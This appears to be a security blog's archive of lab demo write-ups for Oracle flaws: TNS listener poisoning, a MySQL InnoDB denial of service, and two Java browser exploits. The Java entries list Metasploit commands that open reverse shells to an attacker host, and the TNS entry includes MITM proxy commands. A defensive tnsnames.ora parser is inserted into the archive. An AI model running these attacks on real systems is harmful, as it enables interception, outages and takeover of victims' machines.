Tag Archives: Oracle

CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

Timeline :

Vulnerability discovered by Joxean Koret in 2008
Vulnerability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability in the Oracle CPU by the vendor on 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18
Fake patching of the vulnerability discovered by Joxean Koret on 2012-04-26

PoC provided by :

Joxean Koret

Reference(s) :

Oracle CPU of April 2012
Joxean Koret details and PoC
CVE-2012-1675
Oracle Security Alert for CVE-2012-1675

Affected version(s) :

All versions of Oracle Database

Tested with :

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

Description :

Using Joxean Koret's PoC requires that the database name be exactly 6 characters long.

Database server characteristics :

IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no clients IPs restrictions
Database name : arcsig
Database username : arcsig
Database password : testtest

Database client characteristics :

IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0

The "tnsnames.ora" file is as below :

TARGET.DB=
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    (CONNECT_DATA =
      (SERVICE_NAME = arcsig)
    )
  )
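Because this demo hinges on where the client's tnsnames.ora sends it (and on the service name the PoC targets), here is an added Python example, not part of the original post, that parses entries in the format shown above into (host, port, service name) endpoints, so a defender can inventory every client's connect descriptors and compare them with the known database servers. The sample entry and all function names are constructed for this example.

```python
import re
# Constructed sample in the shape of the post's tnsnames.ora entry (not the post's own file).
SAMPLE_TNSNAMES = """TARGET.DB=
(DESCRIPTION =
  (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
  (CONNECT_DATA = (SERVICE_NAME = arcsig)))
"""
_TOKEN = re.compile(r"\(|\)|=|[^()=\s]+")  # a paren, '=', or one bare word

def _parse_value(tokens, pos):
    # A value is either one bare word or a run of nested (KEY = value) groups.
    if tokens[pos] != "(":
        return tokens[pos], pos + 1
    groups = []  # list of (key, value) pairs, since keys such as ADDRESS may repeat
    while pos < len(tokens) and tokens[pos] == "(":
        key = tokens[pos + 1]
        value, pos = _parse_value(tokens, pos + 3)  # pos + 2 is the '='
        if pos >= len(tokens) or tokens[pos] != ")":
            raise ValueError("unbalanced parenthesis after key %r" % key)
        groups.append((key.upper(), value))
        pos += 1
    return groups, pos

def parse_tnsnames(text):
    """Return {ALIAS: parsed tree} for every net service name; '#' starts a comment."""
    tokens = _TOKEN.findall("\n".join(ln.split("#", 1)[0] for ln in text.splitlines()))
    entries, pos = {}, 0
    while pos < len(tokens):
        alias = tokens[pos]
        if pos + 2 >= len(tokens) or tokens[pos + 1] != "=":
            raise ValueError("expected '=' after alias %r" % alias)
        value, pos = _parse_value(tokens, pos + 2)
        entries[alias.upper()] = value
    return entries

def _find(tree, key):
    # Yield every value stored under key at any depth of the nested tree.
    if isinstance(tree, list):
        for k, v in tree:
            if k == key:
                yield v
            yield from _find(v, key)

def endpoints(entries):
    """Map alias -> sorted (host, port, service_name) tuples the client will dial."""
    out = {}
    for alias, tree in entries.items():
        services = list(_find(tree, "SERVICE_NAME")) or [""]
        out[alias] = sorted({(dict(a).get("HOST"), int(dict(a).get("PORT", 1521)), s)
                             for a in _find(tree, "ADDRESS") for s in services})
    return out
```

Feeding it every tnsnames.ora collected from client hosts and diffing the resulting endpoints against the list of legitimate listeners is a cheap way to spot connect descriptors that point somewhere unexpected.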

Attacker characteristics :

IP : 192.168.178.100
Usage of PoC provided by Joxean Koret

Demonstration :

PoC validation phase

On database server :

ifconfig
ps faux
netstat -tan

On database client :

ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus arcsig@TARGET.DB
HELP
QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, which will intercept the communication between the client and the database :

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus
sqlplus arcsig@TARGET.DB
?
? INDEX
TOTO
QUIT

You can see that the communication is intercepted by the proxy.

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities on 2012-03-21
Details of the vulnerability published by Oracle on 2012-04-10
PoC provided by Oracle on 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

On 21 March, Oracle released two new versions of MySQL, 5.5.22 and 5.1.62. These versions fix two bugs, #13510739 and #63775, which are considered security fixes, but no impact details for these bugs are provided and the bug reports are closed.
Unfortunately for Oracle, the two new versions shipped with a development script, "mysql-test/suite/innodb/t/innodb_bug13510739.test", used to test the fix for the vulnerabilities, which amounts to a PoC provided by Oracle. The bugs cause a denial of service of MySQL "ON HANDLER READ NEXT AFTER DELETE RECORD". All the details are available in the script or at the Pastebin link above.

Commands :

mysql -u root -p database < innodb_bug13510739.test

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters on 2011-08-01
Coordinated public release of the vulnerability on 2012-02-14
Details of the vulnerability published by Jeroen Frijters on 2012-02-23
Metasploit PoC provided on 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
set SRVHOST 192.168.178.100
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.178.100
exploit

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Timeline :

Vulnerability "ZDI-12-037" reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI on 2011-10-28 for "ZDI-12-037"
Coordinated public release of the vulnerability on 2012-02-22
Metasploit PoC provided on 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid